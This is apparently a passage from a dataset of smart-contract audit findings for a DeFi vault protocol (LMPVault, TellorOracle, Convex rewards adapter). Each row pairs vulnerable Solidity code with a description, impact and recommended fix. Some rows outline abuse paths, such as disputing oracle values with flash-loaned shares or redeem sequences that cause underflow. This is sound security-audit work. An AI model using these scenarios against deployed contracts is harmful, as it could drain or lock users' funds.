_calcUserWithdrawSharesToBurn(\\n destVault,\\n shares,\\n info.totalAssetsToPull - Math.max(info.debtDecrease, info.totalAssetsPulled),\\n totalVaultShares\\n );\\n..SNIP..\\n // At this point should have all the funds we need sitting in in the vault\\n uint256 returnedAssets = info.assetsFromIdle + info.totalAssetsPulled;\\n```\\n","Ensure that $asset_{preview} \\le asset_{actual}$.\\nAlternatively, document that the `previewRedeem` and `redeem` functions deviate from the ERC4626 specification in the comments 
and/or documentation.","It was understood from the protocol team that they anticipate external parties to integrate directly with the LMPVault (e.g., vault shares as collateral). Thus, the LMPVault must be ERC4626 compliance. Otherwise, the caller (internal or external) of the `previewRedeem` function might receive incorrect information, leading to the wrong action being executed.","```\\nFile: LMPVault.sol\\n function redeem(\\n uint256 shares,\\n address receiver,\\n address owner\\n ) public virtual override nonReentrant noNavDecrease ensureNoNavOps returns (uint256 assets) {\\n uint256 maxShares = maxRedeem(owner);\\n if (shares > maxShares) {\\n revert ERC4626ExceededMaxRedeem(owner, shares, maxShares);\\n }\\n uint256 possibleAssets = previewRedeem(shares); // @audit-info round down, which is correct because user won't get too many\\n\\n assets = _withdraw(possibleAssets, shares, receiver, owner);\\n }\\n```\\n" +Malicious users could lock in the NAV/Share of the DV to cause the loss of fees,medium,"The `_collectFees` function only collects fees whenever the NAV/Share exceeds the last NAV/Share.\\nDuring initialization, the `navPerShareHighMark` is set to `1`, effectively `1` ETH per share (1:1 ratio). Assume the following:\\nIt is at the early stage, and only a few shares (0.5 shares) were minted in the LMPVault\\nThere is a sudden increase in the price of an LP token in a certain DV (Temporarily)\\n`performanceFeeBps` is 10%\\nIn this case, the debt value of DV's shares will increase, which will cause LMPVault's debt to increase. This event caused the `currentNavPerShare` to increase to `1.4` temporarily.\\nSomeone calls the permissionless `updateDebtReporting` function. Thus, the profit will be `0.4 ETH * 0.5 Shares = 0.2 ETH`, which is small due to the number of shares (0.5 shares) in the LMPVault at this point. The fee will be `0.02 ETH` (~40 USD). 
Thus, the fee earned is very little and almost negligible.\\nAt the end of the function, the `navPerShareHighMark` will be set to `1.4`, and the highest NAV/Share will be locked forever. After some time, the price of the LP tokens fell back to its expected price range, and the `currentNavPerShare` fell to around `1.05`. No fee will be collected from this point onwards unless the NAV/Share is raised above `1.4`.\\nIt might take a long time to reach the `1.4` threshold, or in the worst case, the spike is temporary, and it will never reach `1.4` again. So, when the NAV/Share of the LMPVault is 1.0 to `1.4`, the protocol only collects `0.02 ETH` (~40 USD), which is too little.\\n```\\nfunction _collectFees(uint256 idle, uint256 debt, uint256 totalSupply) internal {\\n address sink = feeSink;\\n uint256 fees = 0;\\n uint256 shares = 0;\\n uint256 profit = 0;\\n\\n // If there's no supply then there should be no assets and so nothing\\n // to actually take fees on\\n if (totalSupply == 0) {\\n return;\\n }\\n\\n uint256 currentNavPerShare = ((idle + debt) * MAX_FEE_BPS) / totalSupply;\\n uint256 effectiveNavPerShareHighMark = navPerShareHighMark;\\n\\n if (currentNavPerShare > effectiveNavPerShareHighMark) {\\n // Even if we aren't going to take the fee (haven't set a sink)\\n // We still want to calculate so we can emit for off-chain analysis\\n profit = (currentNavPerShare - effectiveNavPerShareHighMark) * totalSupply;\\n fees = profit.mulDiv(performanceFeeBps, (MAX_FEE_BPS ** 2), Math.Rounding.Up);\\n if (fees > 0 && sink != address(0)) {\\n // Calculated separate from other mints as normal share mint is round down\\n shares = _convertToShares(fees, Math.Rounding.Up);\\n _mint(sink, shares);\\n emit Deposit(address(this), sink, fees, shares);\\n }\\n // Set our new high water mark, the last nav/share height we took fees\\n navPerShareHighMark = currentNavPerShare;\\n navPerShareHighMarkTimestamp = block.timestamp;\\n emit NewNavHighWatermark(currentNavPerShare, 
block.timestamp);\\n }\\n emit FeeCollected(fees, sink, shares, profit, idle, debt);\\n}\\n```\\n",Issue Malicious users could lock in the NAV/Share of the DV to cause the loss of fees\\nConsider implementing a sophisticated off-chain algorithm to determine the right time to lock the `navPerShareHighMark` and/or restrict the access to the `updateDebtReporting` function to only protocol-owned addresses.,Loss of fee. Fee collection is an integral part of the protocol; thus the loss of fee is considered a High issue.,"```\\nfunction _collectFees(uint256 idle, uint256 debt, uint256 totalSupply) internal {\\n address sink = feeSink;\\n uint256 fees = 0;\\n uint256 shares = 0;\\n uint256 profit = 0;\\n\\n // If there's no supply then there should be no assets and so nothing\\n // to actually take fees on\\n if (totalSupply == 0) {\\n return;\\n }\\n\\n uint256 currentNavPerShare = ((idle + debt) * MAX_FEE_BPS) / totalSupply;\\n uint256 effectiveNavPerShareHighMark = navPerShareHighMark;\\n\\n if (currentNavPerShare > effectiveNavPerShareHighMark) {\\n // Even if we aren't going to take the fee (haven't set a sink)\\n // We still want to calculate so we can emit for off-chain analysis\\n profit = (currentNavPerShare - effectiveNavPerShareHighMark) * totalSupply;\\n fees = profit.mulDiv(performanceFeeBps, (MAX_FEE_BPS ** 2), Math.Rounding.Up);\\n if (fees > 0 && sink != address(0)) {\\n // Calculated separate from other mints as normal share mint is round down\\n shares = _convertToShares(fees, Math.Rounding.Up);\\n _mint(sink, shares);\\n emit Deposit(address(this), sink, fees, shares);\\n }\\n // Set our new high water mark, the last nav/share height we took fees\\n navPerShareHighMark = currentNavPerShare;\\n navPerShareHighMarkTimestamp = block.timestamp;\\n emit NewNavHighWatermark(currentNavPerShare, block.timestamp);\\n }\\n emit FeeCollected(fees, sink, shares, profit, idle, debt);\\n}\\n```\\n" +Malicious users could use back old values,medium,"Per the Teller's 
User Checklist, it is possible that a potential attacker could go back in time to find a desired value in the event that a Tellor value is disputed. Following is the extract taken from the checklist:\\nEnsure that functions do not use old Tellor values\\nIn the event where a Tellor value is disputed, the disputed value is removed & previous values remain. Prevent potential attackers from going back in time to find a desired value with a check in your contracts. This repo is a great reference for integrating Tellor.\\nThe current implementation lack measure to guard against such attack.\\n```\\nFile: TellorOracle.sol\\n function getPriceInEth(address tokenToPrice) external returns (uint256) {\\n TellorInfo memory tellorInfo = _getQueryInfo(tokenToPrice);\\n uint256 timestamp = block.timestamp;\\n // Giving time for Tellor network to dispute price\\n (bytes memory value, uint256 timestampRetrieved) = getDataBefore(tellorInfo.queryId, timestamp - 30 minutes);\\n uint256 tellorStoredTimeout = uint256(tellorInfo.pricingTimeout);\\n uint256 tokenPricingTimeout = tellorStoredTimeout == 0 ? DEFAULT_PRICING_TIMEOUT : tellorStoredTimeout;\\n\\n // Check that something was returned and freshness of price.\\n if (timestampRetrieved == 0 || timestamp - timestampRetrieved > tokenPricingTimeout) {\\n revert InvalidDataReturned();\\n }\\n\\n uint256 price = abi.decode(value, (uint256));\\n return _denominationPricing(tellorInfo.denomination, price, tokenToPrice);\\n }\\n```\\n\\nAnyone can submit a dispute to Tellor by paying a fee. The disputed values are immediately removed upon submission, and the previous values will remain. The attacks are profitable as long as the economic gains are higher than the dispute fee. 
For instance, this can be achieved by holding large amounts of vault shares (e.g., obtained using own funds or flash-loan) to amplify the gain before manipulating the assets within it to increase the values.","Update the affected function as per the recommendation in Teller's User Checklist.\\n```\\nfunction getPriceInEth(address tokenToPrice) external returns (uint256) {\\n TellorInfo memory tellorInfo = _getQueryInfo(tokenToPrice);\\n uint256 timestamp = block.timestamp;\\n // Giving time for Tellor network to dispute price\\n (bytes memory value, uint256 timestampRetrieved) = getDataBefore(tellorInfo.queryId, timestamp - 30 minutes);\\n uint256 tellorStoredTimeout = uint256(tellorInfo.pricingTimeout);\\n uint256 tokenPricingTimeout = tellorStoredTimeout == 0 ? DEFAULT_PRICING_TIMEOUT : tellorStoredTimeout;\\n\\n // Check that something was returned and freshness of price.\\n if (timestampRetrieved == 0 || timestamp - timestampRetrieved > tokenPricingTimeout) {\\n revert InvalidDataReturned();\\n }\\n \\n// Add the line below\\n if (timestampRetrieved > lastStoredTimestamps[tellorInfo.queryId]) {\\n// Add the line below\\n lastStoredTimestamps[tellorInfo.queryId] = timestampRetrieved;\\n// Add the line below\\n lastStoredPrices[tellorInfo.queryId] = value;\\n// Add the line below\\n } else {\\n// Add the line below\\n value = lastStoredPrices[tellorInfo.queryId]\\n// Add the line below\\n }\\n\\n uint256 price = abi.decode(value, (uint256));\\n return _denominationPricing(tellorInfo.denomination, price, tokenToPrice);\\n}\\n```\\n","Malicious users could manipulate the price returned by the oracle to be higher or lower than expected. 
The protocol relies on the oracle to provide accurate pricing for many critical operations, such as determining the debt values of DV, calculators/stats used during the rebalancing process, NAV/shares of the LMPVault, and determining how much assets the users should receive during withdrawal.\\nIncorrect pricing would result in many implications that lead to a loss of assets, such as users withdrawing more or fewer assets than expected due to over/undervalued vaults or strategy allowing an unprofitable rebalance to be executed.","```\\nFile: TellorOracle.sol\\n function getPriceInEth(address tokenToPrice) external returns (uint256) {\\n TellorInfo memory tellorInfo = _getQueryInfo(tokenToPrice);\\n uint256 timestamp = block.timestamp;\\n // Giving time for Tellor network to dispute price\\n (bytes memory value, uint256 timestampRetrieved) = getDataBefore(tellorInfo.queryId, timestamp - 30 minutes);\\n uint256 tellorStoredTimeout = uint256(tellorInfo.pricingTimeout);\\n uint256 tokenPricingTimeout = tellorStoredTimeout == 0 ? 
DEFAULT_PRICING_TIMEOUT : tellorStoredTimeout;\\n\\n // Check that something was returned and freshness of price.\\n if (timestampRetrieved == 0 || timestamp - timestampRetrieved > tokenPricingTimeout) {\\n revert InvalidDataReturned();\\n }\\n\\n uint256 price = abi.decode(value, (uint256));\\n return _denominationPricing(tellorInfo.denomination, price, tokenToPrice);\\n }\\n```\\n" +Incorrect handling of Stash Tokens within the `ConvexRewardsAdapter._claimRewards()`,medium,"The primary task of the `ConvexRewardAdapter._claimRewards()` function revolves around claiming rewards for Convex/Aura staked LP tokens.\\n```\\nfunction _claimRewards(\\n address gauge,\\n address defaultToken,\\n address sendTo\\n) internal returns (uint256[] memory amounts, address[] memory tokens) {\\n // rest of code \\n\\n // Record balances before claiming\\n for (uint256 i = 0; i < totalLength; ++i) {\\n // The totalSupply check is used to identify stash tokens, which can\\n // substitute as rewardToken but lack a ""balanceOf()""\\n if (IERC20(rewardTokens[i]).totalSupply() > 0) {\\n balancesBefore[i] = IERC20(rewardTokens[i]).balanceOf(account);\\n }\\n }\\n\\n // Claim rewards\\n bool result = rewardPool.getReward(account, /*_claimExtras*/ true);\\n if (!result) {\\n revert RewardAdapter.ClaimRewardsFailed();\\n }\\n\\n // Record balances after claiming and calculate amounts claimed\\n for (uint256 i = 0; i < totalLength; ++i) {\\n uint256 balance = 0;\\n // Same check for ""stash tokens""\\n if (IERC20(rewardTokens[i]).totalSupply() > 0) {\\n balance = IERC20(rewardTokens[i]).balanceOf(account);\\n }\\n\\n amountsClaimed[i] = balance - balancesBefore[i];\\n\\n if (sendTo != address(this) && amountsClaimed[i] > 0) {\\n IERC20(rewardTokens[i]).safeTransfer(sendTo, amountsClaimed[i]);\\n }\\n }\\n\\n RewardAdapter.emitRewardsClaimed(rewardTokens, amountsClaimed);\\n\\n return (amountsClaimed, rewardTokens);\\n}\\n```\\n\\nAn intriguing aspect of this function's logic lies in its 
management of ""stash tokens"" from AURA staking. The check to identify whether `rewardToken[i]` is a stash token involves attempting to invoke `IERC20(rewardTokens[i]).totalSupply()`. If the returned total supply value is `0`, the implementation assumes the token is a stash token and bypasses it. However, this check is flawed since the total supply of stash tokens can indeed be non-zero. For instance, at this address, the stash token has `totalSupply = 150467818494283559126567`, which is definitely not zero.\\nThis misstep in checking can potentially lead to a Denial-of-Service (DOS) situation when calling the `claimRewards()` function. This stems from the erroneous attempt to call the `balanceOf` function on stash tokens, which lack the `balanceOf()` method. Consequently, such incorrect calls might incapacitate the destination vault from claiming rewards from AURA, resulting in protocol losses.","To accurately determine whether a token is a stash token, it is advised to perform a low-level `balanceOf()` call to the token and subsequently validate the call's success.","The `AuraRewardsAdapter.claimRewards()` function could suffer from a Denial-of-Service (DOS) scenario.\\nThe destination vault's ability to claim rewards from AURA staking might be hampered, leading to protocol losses.","```\\nfunction _claimRewards(\\n address gauge,\\n address defaultToken,\\n address sendTo\\n) internal returns (uint256[] memory amounts, address[] memory tokens) {\\n // rest of code \\n\\n // Record balances before claiming\\n for (uint256 i = 0; i < totalLength; ++i) {\\n // The totalSupply check is used to identify stash tokens, which can\\n // substitute as rewardToken but lack a ""balanceOf()""\\n if (IERC20(rewardTokens[i]).totalSupply() > 0) {\\n balancesBefore[i] = IERC20(rewardTokens[i]).balanceOf(account);\\n }\\n }\\n\\n // Claim rewards\\n bool result = rewardPool.getReward(account, /*_claimExtras*/ true);\\n if (!result) {\\n revert 
RewardAdapter.ClaimRewardsFailed();\\n }\\n\\n // Record balances after claiming and calculate amounts claimed\\n for (uint256 i = 0; i < totalLength; ++i) {\\n uint256 balance = 0;\\n // Same check for ""stash tokens""\\n if (IERC20(rewardTokens[i]).totalSupply() > 0) {\\n balance = IERC20(rewardTokens[i]).balanceOf(account);\\n }\\n\\n amountsClaimed[i] = balance - balancesBefore[i];\\n\\n if (sendTo != address(this) && amountsClaimed[i] > 0) {\\n IERC20(rewardTokens[i]).safeTransfer(sendTo, amountsClaimed[i]);\\n }\\n }\\n\\n RewardAdapter.emitRewardsClaimed(rewardTokens, amountsClaimed);\\n\\n return (amountsClaimed, rewardTokens);\\n}\\n```\\n" +`navPerShareHighMark` not reset to 1.0,medium,"The LMPVault will only collect fees if the current NAV (currentNavPerShare) is more than the last NAV (effectiveNavPerShareHighMark).\\n```\\nFile: LMPVault.sol\\n function _collectFees(uint256 idle, uint256 debt, uint256 totalSupply) internal {\\n address sink = feeSink;\\n uint256 fees = 0;\\n uint256 shares = 0;\\n uint256 profit = 0;\\n\\n // If there's no supply then there should be no assets and so nothing\\n // to actually take fees on\\n if (totalSupply == 0) {\\n return;\\n }\\n\\n uint256 currentNavPerShare = ((idle + debt) * MAX_FEE_BPS) / totalSupply;\\n uint256 effectiveNavPerShareHighMark = navPerShareHighMark;\\n\\n if (currentNavPerShare > effectiveNavPerShareHighMark) {\\n // Even if we aren't going to take the fee (haven't set a sink)\\n // We still want to calculate so we can emit for off-chain analysis\\n profit = (currentNavPerShare - effectiveNavPerShareHighMark) * totalSupply;\\n```\\n\\nAssume the current LMPVault state is as follows:\\ntotalAssets = 15 WETH\\ntotalSupply = 10 shares\\nNAV/share = 1.5\\neffectiveNavPerShareHighMark = 1.5\\nAlice owned all the remaining shares in the vault, and she decided to withdraw all her 10 shares. As a result, the `totalAssets` and `totalSupply` become zero. 
It was found that when all the shares have been exited, the `effectiveNavPerShareHighMark` is not automatically reset to 1.0.\\nAssume that at some point later, other users started to deposit into the LMPVault, and the vault invests the deposited WETH to profitable destination vaults, resulting in the real/actual NAV rising from 1.0 to 1.49 over a period of time.\\nThe system is designed to collect fees when there is a rise in NAV due to profitable investment from sound rebalancing strategies. However, since the `effectiveNavPerShareHighMark` has been set to 1.5 previously, no fee is collected when the NAV rises from 1.0 to 1.49, resulting in a loss of fee.","Consider resetting the `navPerShareHighMark` to 1.0 whenever a vault has been fully exited.\\n```\\nfunction _withdraw(\\n uint256 assets,\\n uint256 shares,\\n address receiver,\\n address owner\\n) internal virtual returns (uint256) {\\n..SNIP..\\n _burn(owner, shares);\\n \\n// Add the line below\\n if (totalSupply() == 0) navPerShareHighMark = MAX_FEE_BPS;\\n\\n emit Withdraw(msg.sender, receiver, owner, returnedAssets, shares);\\n\\n _baseAsset.safeTransfer(receiver, returnedAssets);\\n\\n return returnedAssets;\\n}\\n```\\n",Loss of fee. 
Fee collection is an integral part of the protocol; thus the loss of fee is considered a High issue.,"```\\nFile: LMPVault.sol\\n function _collectFees(uint256 idle, uint256 debt, uint256 totalSupply) internal {\\n address sink = feeSink;\\n uint256 fees = 0;\\n uint256 shares = 0;\\n uint256 profit = 0;\\n\\n // If there's no supply then there should be no assets and so nothing\\n // to actually take fees on\\n if (totalSupply == 0) {\\n return;\\n }\\n\\n uint256 currentNavPerShare = ((idle + debt) * MAX_FEE_BPS) / totalSupply;\\n uint256 effectiveNavPerShareHighMark = navPerShareHighMark;\\n\\n if (currentNavPerShare > effectiveNavPerShareHighMark) {\\n // Even if we aren't going to take the fee (haven't set a sink)\\n // We still want to calculate so we can emit for off-chain analysis\\n profit = (currentNavPerShare - effectiveNavPerShareHighMark) * totalSupply;\\n```\\n" +Vault cannot be added back into the vault registry,medium,"When removing a vault from the registry, all states related to the vaults such as the `_vaults`, `_assets`, `_vaultsByAsset` are cleared except the `_vaultsByType` state.\\n```\\n function removeVault(address vaultAddress) external onlyUpdater {\\n Errors.verifyNotZero(vaultAddress, ""vaultAddress"");\\n\\n // remove from vaults list\\n if (!_vaults.remove(vaultAddress)) revert VaultNotFound(vaultAddress);\\n\\n address asset = ILMPVault(vaultAddress).asset();\\n\\n // remove from assets list if this was the last vault for that asset\\n if (_vaultsByAsset[asset].length() == 1) {\\n //slither-disable-next-line unused-return\\n _assets.remove(asset);\\n }\\n\\n // remove from vaultsByAsset mapping\\n if (!_vaultsByAsset[asset].remove(vaultAddress)) revert VaultNotFound(vaultAddress);\\n\\n emit VaultRemoved(asset, vaultAddress);\\n }\\n```\\n\\nThe uncleared `_vaultsByType` state will cause the `addVault` function to revert when trying to add the vault back into the registry even though the vault does not exist in the registry 
anymore.\\n```\\n if (!_vaultsByType[vaultType].add(vaultAddress)) revert VaultAlreadyExists(vaultAddress);\\n```\\n","Clear the `_vaultsByType` state when removing the vault from the registry.\\n```\\n function removeVault(address vaultAddress) external onlyUpdater {\\n Errors.verifyNotZero(vaultAddress, ""vaultAddress"");\\n// Add the line below\\n ILMPVault vault = ILMPVault(vaultAddress);\\n// Add the line below\\n bytes32 vaultType = vault.vaultType();\\n\\n // remove from vaults list\\n if (!_vaults.remove(vaultAddress)) revert VaultNotFound(vaultAddress);\\n\\n address asset = ILMPVault(vaultAddress).asset();\\n\\n // remove from assets list if this was the last vault for that asset\\n if (_vaultsByAsset[asset].length() == 1) {\\n //slither-disable-next-line unused-return\\n _assets.remove(asset);\\n }\\n\\n // remove from vaultsByAsset mapping\\n if (!_vaultsByAsset[asset].remove(vaultAddress)) revert VaultNotFound(vaultAddress);\\n// Add the line below\\n if (!_vaultsByType[vaultType].remove(vaultAddress)) revert VaultNotFound(vaultAddress);\\n\\n emit VaultRemoved(asset, vaultAddress);\\n }\\n```\\n",The `addVault` function is broken in the edge case when the updater tries to add the vault back into the registry after removing it. 
It affects all the operations of the protocol that rely on the vault registry.,"```\\n function removeVault(address vaultAddress) external onlyUpdater {\\n Errors.verifyNotZero(vaultAddress, ""vaultAddress"");\\n\\n // remove from vaults list\\n if (!_vaults.remove(vaultAddress)) revert VaultNotFound(vaultAddress);\\n\\n address asset = ILMPVault(vaultAddress).asset();\\n\\n // remove from assets list if this was the last vault for that asset\\n if (_vaultsByAsset[asset].length() == 1) {\\n //slither-disable-next-line unused-return\\n _assets.remove(asset);\\n }\\n\\n // remove from vaultsByAsset mapping\\n if (!_vaultsByAsset[asset].remove(vaultAddress)) revert VaultNotFound(vaultAddress);\\n\\n emit VaultRemoved(asset, vaultAddress);\\n }\\n```\\n" +LMPVault.updateDebtReporting could underflow because of subtraction before addition,medium,"`debt = totalDebt - prevNTotalDebt + afterNTotalDebt` where prevNTotalDebt equals `(destInfo.currentDebt * originalShares) / Math.max(destInfo.ownedShares, 1)` and the key to finding a scenario for underflow starts by noting that each value deducted from totalDebt is calculated as `cachedCurrentDebt.mulDiv(sharesToBurn, cachedDvShares, Math.Rounding.Up)`\\nLMPDebt\\n```\\n// rest of code\\nL292 totalDebtBurn = cachedCurrentDebt.mulDiv(sharesToBurn, cachedDvShares, Math.Rounding.Up);\\n// rest of code\\nL440 uint256 currentDebt = (destInfo.currentDebt * originalShares) / Math.max(destInfo.ownedShares, 1);\\nL448 totalDebtDecrease = currentDebt;\\n```\\n\\nLet: `totalDebt = destInfo.currentDebt = destInfo.debtBasis = cachedCurrentDebt = cachedDebtBasis = 11` `totalSupply = destInfo.ownedShares = cachedDvShares = 10`\\nThat way: `cachedCurrentDebt * 1 / cachedDvShares = 1.1` but totalDebtBurn would be rounded up to 2\\n`sharesToBurn` could easily be 1 if there was a loss that changes the ratio from `1:1.1` to `1:1`. 
Therefore `currentDvDebtValue = 10 * 1 = 10`\\n```\\nif (currentDvDebtValue < updatedDebtBasis) {\\n // We are currently sitting at a loss. Limit the value we can pull from\\n // the destination vault\\n currentDvDebtValue = currentDvDebtValue.mulDiv(userShares, totalVaultShares, Math.Rounding.Down);\\n currentDvShares = currentDvShares.mulDiv(userShares, totalVaultShares, Math.Rounding.Down);\\n}\\n\\n// Shouldn't pull more than we want\\n// Or, we're not in profit so we limit the pull\\nif (currentDvDebtValue < maxAssetsToPull) {\\n maxAssetsToPull = currentDvDebtValue;\\n}\\n\\n// Calculate the portion of shares to burn based on the assets we need to pull\\n// and the current total debt value. These are destination vault shares.\\nsharesToBurn = currentDvShares.mulDiv(maxAssetsToPull, currentDvDebtValue, Math.Rounding.Up);\\n```\\n\\nSteps\\ncall redeem 1 share and previewRedeem request 1 `maxAssetsToPull`\\n2 debt would be burn\\nTherefore totalDebt = 11-2 = 9\\ncall another redeem 1 share and request another 1 `maxAssetsToPull`\\n2 debts would be burn again and\\ntotalDebt would be 7, but prevNTotalDebt = 11 * 8 // 10 = 8\\nUsing 1, 10 and 11 are for illustration and the underflow could occur in several other ways. E.g if we had used `100,001`, `1,000,010` and `1,000,011` respectively.",Add before subtracting. ETH in circulation is not enough to cause an overflow.\\n```\\n- debt = totalDebt - prevNTotalDebt + afterNTotalDebt\\n+ debt = totalDebt + afterNTotalDebt - prevNTotalDebt\\n```\\n,"_updateDebtReporting could underflow and break a very important core functionality of the protocol. updateDebtReporting is so critical that funds could be lost if it doesn't work. 
Funds could be lost both when the vault is in profit or at loss.\\nIf in profit, users would want to call updateDebtReporting so that they get more asset for their shares (based on the profit).\\nIf in loss, the whole vault asset is locked and withdrawals won't be successful because the Net Asset Value is not supposed to reduce by such action (noNavDecrease modifier). Net Asset Value has reduced because the loss would reduce totalDebt, but the only way to update the totalDebt record is by calling updateDebtReporting. And those impacted the most are those with large funds. The bigger the fund, the more NAV would decrease by withdrawals.","```\\n// rest of code\\nL292 totalDebtBurn = cachedCurrentDebt.mulDiv(sharesToBurn, cachedDvShares, Math.Rounding.Up);\\n// rest of code\\nL440 uint256 currentDebt = (destInfo.currentDebt * originalShares) / Math.max(destInfo.ownedShares, 1);\\nL448 totalDebtDecrease = currentDebt;\\n```\\n" +LMPVault: DoS when `feeSink` balance hits `perWalletLimit`,medium,"`_collectFees` mints shares to `feeSink`.\\n```\\nfunction _collectFees(uint256 idle, uint256 debt, uint256 totalSupply) internal {\\n address sink = feeSink;\\n // rest of code.\\n if (fees > 0 && sink != address(0)) {\\n // Calculated separate from other mints as normal share mint is round down\\n shares = _convertToShares(fees, Math.Rounding.Up);\\n _mint(sink, shares);\\n emit Deposit(address(this), sink, fees, shares);\\n }\\n // rest of code.\\n}\\n```\\n\\n`_mint` calls `_beforeTokenTransfer` internally to check if the target wallet exceeds `perWalletLimit`.\\n```\\nfunction _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual override whenNotPaused {\\n // rest of code.\\n if (balanceOf(to) + amount > perWalletLimit) {\\n revert OverWalletLimit(to);\\n }\\n}\\n```\\n\\n`_collectFees` function will revert if `balanceOf(feeSink) + fee shares > perWalletLimit`. 
`updateDebtReporting`, `rebalance` and `flashRebalance` call `_collectFees` internally so they will be unfunctional.",Allow `feeSink` to exceeds `perWalletLimit`.,"`updateDebtReporting`, `rebalance` and `flashRebalance` won't be working if `feeSink` balance hits `perWalletLimit`.","```\\nfunction _collectFees(uint256 idle, uint256 debt, uint256 totalSupply) internal {\\n address sink = feeSink;\\n // rest of code.\\n if (fees > 0 && sink != address(0)) {\\n // Calculated separate from other mints as normal share mint is round down\\n shares = _convertToShares(fees, Math.Rounding.Up);\\n _mint(sink, shares);\\n emit Deposit(address(this), sink, fees, shares);\\n }\\n // rest of code.\\n}\\n```\\n" +Incorrect amount given as input to `_handleRebalanceIn` when `flashRebalance` is called,medium,"The issue occurs in the `flashRebalance` function below :\\n```\\nfunction flashRebalance(\\n DestinationInfo storage destInfoOut,\\n DestinationInfo storage destInfoIn,\\n IERC3156FlashBorrower receiver,\\n IStrategy.RebalanceParams memory params,\\n FlashRebalanceParams memory flashParams,\\n bytes calldata data\\n) external returns (uint256 idle, uint256 debt) {\\n // rest of code\\n\\n // Handle increase (shares coming ""In"", getting underlying from the swapper and trading for new shares)\\n if (params.amountIn > 0) {\\n IDestinationVault dvIn = IDestinationVault(params.destinationIn);\\n\\n // get ""before"" counts\\n uint256 tokenInBalanceBefore = IERC20(params.tokenIn).balanceOf(address(this));\\n\\n // Give control back to the solver so they can make use of the ""out"" assets\\n // and get our ""in"" asset\\n bytes32 flashResult = receiver.onFlashLoan(msg.sender, params.tokenIn, params.amountIn, 0, data);\\n\\n // We assume the solver will send us the assets\\n uint256 tokenInBalanceAfter = IERC20(params.tokenIn).balanceOf(address(this));\\n\\n // Make sure the call was successful and verify we have at least the assets we think\\n // we were getting\\n if (\\n 
flashResult != keccak256(""ERC3156FlashBorrower.onFlashLoan"")\\n || tokenInBalanceAfter < tokenInBalanceBefore + params.amountIn\\n ) {\\n revert Errors.FlashLoanFailed(params.tokenIn, params.amountIn);\\n }\\n\\n if (params.tokenIn != address(flashParams.baseAsset)) {\\n // @audit should be `tokenInBalanceAfter - tokenInBalanceBefore` given to `_handleRebalanceIn`\\n (uint256 debtDecreaseIn, uint256 debtIncreaseIn) =\\n _handleRebalanceIn(destInfoIn, dvIn, params.tokenIn, tokenInBalanceAfter);\\n idleDebtChange.debtDecrease += debtDecreaseIn;\\n idleDebtChange.debtIncrease += debtIncreaseIn;\\n } else {\\n idleDebtChange.idleIncrease += tokenInBalanceAfter - tokenInBalanceBefore;\\n }\\n }\\n // rest of code\\n}\\n```\\n\\nAs we can see from the code above, the function executes a flashloan in order to receive th tokenIn amount which should be the difference between `tokenInBalanceAfter` (balance of the contract after the flashloan) and `tokenInBalanceBefore` (balance of the contract before the flashloan) : `tokenInBalanceAfter` - `tokenInBalanceBefore`.\\nBut when calling the `_handleRebalanceIn` function the wrong deposit amount is given as input, as the total balance `tokenInBalanceAfter` is used instead of the received amount `tokenInBalanceAfter` - tokenInBalanceBefore.\\nBecause the `_handleRebalanceIn` function is supposed to deposit the input amount to the destination vault, this error can result in sending a larger amount of funds to DV then what was intended or this error can cause a DOS of the `flashRebalance` function (due to the insufficient amount error when performing the transfer to DV), all of this will make the rebalance operation fail (or not done correctely) which can have a negative impact on the LMPVault.","Use the correct received tokenIn amount `tokenInBalanceAfter - tokenInBalanceBefore` as input to the `_handleRebalanceIn` function :\\n```\\nfunction flashRebalance(\\n DestinationInfo storage destInfoOut,\\n DestinationInfo storage 
destInfoIn,\\n IERC3156FlashBorrower receiver,\\n IStrategy.RebalanceParams memory params,\\n FlashRebalanceParams memory flashParams,\\n bytes calldata data\\n) external returns (uint256 idle, uint256 debt) {\\n // rest of code\\n\\n // Handle increase (shares coming ""In"", getting underlying from the swapper and trading for new shares)\\n if (params.amountIn > 0) {\\n IDestinationVault dvIn = IDestinationVault(params.destinationIn);\\n\\n // get ""before"" counts\\n uint256 tokenInBalanceBefore = IERC20(params.tokenIn).balanceOf(address(this));\\n\\n // Give control back to the solver so they can make use of the ""out"" assets\\n // and get our ""in"" asset\\n bytes32 flashResult = receiver.onFlashLoan(msg.sender, params.tokenIn, params.amountIn, 0, data);\\n\\n // We assume the solver will send us the assets\\n uint256 tokenInBalanceAfter = IERC20(params.tokenIn).balanceOf(address(this));\\n\\n // Make sure the call was successful and verify we have at least the assets we think\\n // we were getting\\n if (\\n flashResult != keccak256(""ERC3156FlashBorrower.onFlashLoan"")\\n || tokenInBalanceAfter < tokenInBalanceBefore + params.amountIn\\n ) {\\n revert Errors.FlashLoanFailed(params.tokenIn, params.amountIn);\\n }\\n\\n if (params.tokenIn != address(flashParams.baseAsset)) {\\n // @audit Use `tokenInBalanceAfter - tokenInBalanceBefore` as input\\n (uint256 debtDecreaseIn, uint256 debtIncreaseIn) =\\n _handleRebalanceIn(destInfoIn, dvIn, params.tokenIn, tokenInBalanceAfter - tokenInBalanceBefore);\\n idleDebtChange.debtDecrease += debtDecreaseIn;\\n idleDebtChange.debtIncrease += debtIncreaseIn;\\n } else {\\n idleDebtChange.idleIncrease += tokenInBalanceAfter - tokenInBalanceBefore;\\n }\\n }\\n // rest of code\\n}\\n```\\n",See summary,"```\\nfunction flashRebalance(\\n DestinationInfo storage destInfoOut,\\n DestinationInfo storage destInfoIn,\\n IERC3156FlashBorrower receiver,\\n IStrategy.RebalanceParams memory params,\\n FlashRebalanceParams memory 
flashParams,\\n bytes calldata data\\n) external returns (uint256 idle, uint256 debt) {\\n // rest of code\\n\\n // Handle increase (shares coming ""In"", getting underlying from the swapper and trading for new shares)\\n if (params.amountIn > 0) {\\n IDestinationVault dvIn = IDestinationVault(params.destinationIn);\\n\\n // get ""before"" counts\\n uint256 tokenInBalanceBefore = IERC20(params.tokenIn).balanceOf(address(this));\\n\\n // Give control back to the solver so they can make use of the ""out"" assets\\n // and get our ""in"" asset\\n bytes32 flashResult = receiver.onFlashLoan(msg.sender, params.tokenIn, params.amountIn, 0, data);\\n\\n // We assume the solver will send us the assets\\n uint256 tokenInBalanceAfter = IERC20(params.tokenIn).balanceOf(address(this));\\n\\n // Make sure the call was successful and verify we have at least the assets we think\\n // we were getting\\n if (\\n flashResult != keccak256(""ERC3156FlashBorrower.onFlashLoan"")\\n || tokenInBalanceAfter < tokenInBalanceBefore + params.amountIn\\n ) {\\n revert Errors.FlashLoanFailed(params.tokenIn, params.amountIn);\\n }\\n\\n if (params.tokenIn != 